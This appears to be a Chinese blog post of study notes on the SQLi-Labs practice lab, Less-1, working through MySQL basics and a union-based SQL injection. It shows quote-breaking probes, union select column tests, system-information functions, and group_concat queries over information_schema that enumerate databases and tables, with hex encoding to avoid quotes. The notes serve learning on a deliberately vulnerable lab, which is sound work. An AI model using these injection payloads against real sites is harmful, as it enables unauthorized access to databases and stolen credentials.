人生边上
0%

SQLi Labs笔记

发表于 更新于

emmmmm

MySQL基本操作

也没介绍操作,只是写下来方便用。尝试注入的同时在后端验证想法,我觉得这样有助于我理解。

Attach到终端后,直接用mysql -u root 登录就行。然后就来到了MySQl的shell。

1
show databases;

列出所有数据库

一定记得末尾加 ;来结束这条statement!

1
use security;   //选择数据库

插一嘴,没想到markdown还能认出来sql的语法,了不敌了不敌

Less-1

  • 先用 
    1
    ?id='
    可以看到报错
    1
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' LIMIT 0,1' at line 1
    然后猜语句是
    1
    select * from users where id='$id' limit 0,1;
    严谨点儿说我这纯属看了别人的题解,然后先射箭再立靶子。
Limit

关于这个

1
LIMIT 0,1

它在这里并没有什么实际的作用我感觉。“The LIMIT clause is used to specify the number of records to return.”
当然可能是因为我不知道怎么合法地返回多个user的信息我想它应该是对这种情况做的限制

1
where id in (1,2)

这样即可返回俩值,limit就显示作用了
理解错了之前,这个limit 0,1 中的第一个参数0是返回表中第几个(从0开始),第二个参数1就是返回几行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
mysql> select * from users where id in (1,2) limit 1,1;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  2 | Angelina | I-kill-you |
+----+----------+------------+
1 row in set (0.00 sec)

mysql> select * from users where id in (1,2);
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
+----+----------+------------+
2 rows in set (0.00 sec)

就是酱紫喽

Order by
1
order by

不光是可以通过数字指定依据第几列排序,还可通过列名(显然

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
mysql> select * from users order by username;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 14 | admin4   | admin4     |
|  2 | Angelina | I-kill-you |
|  7 | batman   | mob!le     |
| 12 | dhakkan  | dumbo      |
|  1 | Dumb     | Dumb       |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
+----+----------+------------+
13 rows in set (0.00 sec)
正式开始(?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
mysql> select * from users where id='1' union select 1,2,3 limit 0,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id='-1' union select 1,2,3 limit 0,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | 3        |
+----+----------+----------+
1 row in set (0.00 sec)
1
2
3
Welcome    Dhakkan
Your Login name:2
Your Password:3

这里用个-1(表里没有),再结合网页返回的看出来他是返回第2列和第3列。

函数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
select system_user(); --显示系统用户

mysql> select system_user();
+----------------+
| system_user()  |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)

--同理,还有
user()
current_user()
database() -- 当前的数据库
version()   -- 跟web application hacker's handbook 里的@@version 作用是一样的
@@datadir   -- mysql 数据路径(?
@@version_compile_os -- 操作系统

我觉得这些还得看手册,真用生。

1
group_concat()

感觉不行啊这书,书讲的还是太少(还是我没看完的事儿)感觉用函数非常方便。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
mysql> select * from users where id='-1' union select NULL , NULL , group_concat(schema_name) from information_schema.schemata limit 0,1;
+------+----------+-----------------------------------------------------------------+
| id   | username | password                                                        |
+------+----------+-----------------------------------------------------------------+
| NULL | NULL     | information_schema,challenges,mysql,performance_schema,security |
+------+----------+-----------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> select group_concat(table_name) from information_schema.tables where table_schema='security';
+-------------------------------+
| group_concat(table_name)      |
+-------------------------------+
| emails,referers,uagents,users |
+-------------------------------+
1 row in set (0.00 sec)

mysql> select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479;
+-------------------------------+
| group_concat(table_name)      |
+-------------------------------+
| emails,referers,uagents,users |
+-------------------------------+
1 row in set (0.00 sec)

0x7365637572697479即security的十六进制数,这样就避免了引入单引号的问题。